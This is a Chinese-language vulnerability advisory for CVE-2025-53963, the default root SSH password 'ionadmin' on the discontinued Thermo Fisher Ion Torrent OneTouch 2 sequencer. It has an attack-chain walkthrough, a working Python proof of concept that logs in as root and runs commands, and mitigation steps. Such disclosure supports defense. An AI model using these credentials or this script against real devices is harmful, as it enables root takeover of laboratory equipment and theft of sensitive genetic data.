CVE-2025-53963 Thermo Fisher Ion Torrent OneTouch 2 SSH默认弱密码漏洞

漏洞信息

漏洞编号

CVE-2025-53963

漏洞类型

默认口令/弱密码

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Thermo Fisher Ion Torrent OneTouch 2 INS1005527

漏洞概述

CVE-2025-53963是Thermo Fisher Ion Torrent OneTouch 2基因测序设备中的一个严重安全漏洞。该设备运行SSH服务器在默认端口22，其root账户使用弱默认密码"ionadmin"，且系统未强制要求用户更改默认密码。攻击者只需具备网络连接即可利用此漏洞，无需任何认证即可登录SSH服务器并获得root权限，最终实现远程代码执行。此漏洞CVSS评分高达9.8，属于严重级别。值得注意的是，该漏洞影响的产品已不再受厂商维护支持，用户需自行采取安全防护措施。由于该设备用于基因测序等敏感领域，漏洞被利用可能导致敏感生物数据泄露或设备被恶意控制。

技术细节

漏洞源于Thermo Fisher Ion Torrent OneTouch 2设备在出厂时设置了可预测的SSH服务凭证。设备开启SSH服务监听22端口，root账户的默认密码为"ionadmin"且无法强制修改。攻击者可通过以下步骤利用：1) 使用nmap扫描22端口确认SSH服务；2) 使用默认凭证尝试SSH登录；3) 登录成功后获得root shell；4) 在root环境下执行任意命令。由于SSH服务直接暴露在网络中，且使用弱密码认证，攻击者可在短时间内完成入侵。建议用户检查设备SSH服务是否暴露在公网，并立即更改默认凭证。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者使用nmap等工具扫描目标网络，发现22端口开放的SSH服务（Thermo Fisher Ion Torrent OneTouch 2设备）

STEP 2

步骤2: 凭证尝试

攻击者使用默认SSH凭证root/ionadmin尝试登录，无需任何前期认证或用户交互

STEP 3

步骤3: 获得root权限

SSH登录成功后直接获得root shell，具备系统最高权限

STEP 4

步骤4: 远程代码执行

在root环境下执行任意系统命令，可安装后门、窃取数据或完全控制设备

STEP 5

步骤5: 横向移动

以被入侵设备为跳板，攻击同一网络中的其他设备或窃取敏感的基因测序数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-53963 PoC - Thermo Fisher Ion Torrent OneTouch 2 SSH Default Credentials
Usage: python3 cve-2025-53963.py <target_ip>
"""

import socket
import sys
import paramiko
from paramiko import SSHClient, AutoAddPolicy

def check_ssh_vulnerability(target_ip, port=22):
    """Check if target is vulnerable to CVE-2025-53963"""
    print(f"[*] Checking SSH service on {target_ip}:{port}")
    
    # Default credentials for Ion Torrent OneTouch 2
    username = "root"
    password = "ionadmin"
    
    try:
        # Check if SSH port is open
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        result = sock.connect_ex((target_ip, port))
        if result != 0:
            print(f"[-] SSH port {port} is closed")
            return False
        sock.close()
        print(f"[+] SSH port {port} is open")
        
        # Attempt login with default credentials
        print(f"[*] Attempting SSH login with default credentials...")
        client = SSHClient()
        client.set_missing_host_key_policy(AutoAddPolicy())
        
        client.connect(
            hostname=target_ip,
            port=port,
            username=username,
            password=password,
            timeout=10,
            allow_agent=False,
            look_for_keys=False
        )
        
        print(f"[+] SUCCESS: Authenticated with {username}:{password}")
        
        # Execute test command
        stdin, stdout, stderr = client.exec_command('whoami')
        output = stdout.read().decode().strip()
        print(f"[+] Current user: {output}")
        
        # Get root shell
        stdin, stdout, stderr = client.exec_command('id')
        print(f"[+] User ID: {stdout.read().decode().strip()}")
        
        client.close()
        return True
        
    except paramiko.AuthenticationException:
        print(f"[-] Authentication failed with default credentials")
        return False
    except socket.timeout:
        print(f"[-] Connection timeout")
        return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] CVE-2025-53963 PoC - Thermo Fisher Ion Torrent OneTouch 2")
    print(f"[*] Target: {target}")
    
    if check_ssh_vulnerability(target):
        print("\n[!] VULNERABLE: Device uses default SSH credentials")
    else:
        print("\n[*] NOT VULNERABLE or target unreachable")

影响范围

Thermo Fisher Ion Torrent OneTouch 2 INS1005527 (所有版本)

防御指南

临时缓解措施

由于该产品已停止维护，无法获得官方安全更新。建议立即采取以下措施：1) 通过网络防火墙阻止对22端口的外部访问；2) 更改root账户的默认密码ionadmin为强密码；3) 禁用不必要的SSH服务；4) 将设备部署在独立的VLAN中；5) 部署入侵检测系统监控异常SSH登录行为。若设备不再使用，建议安全退役。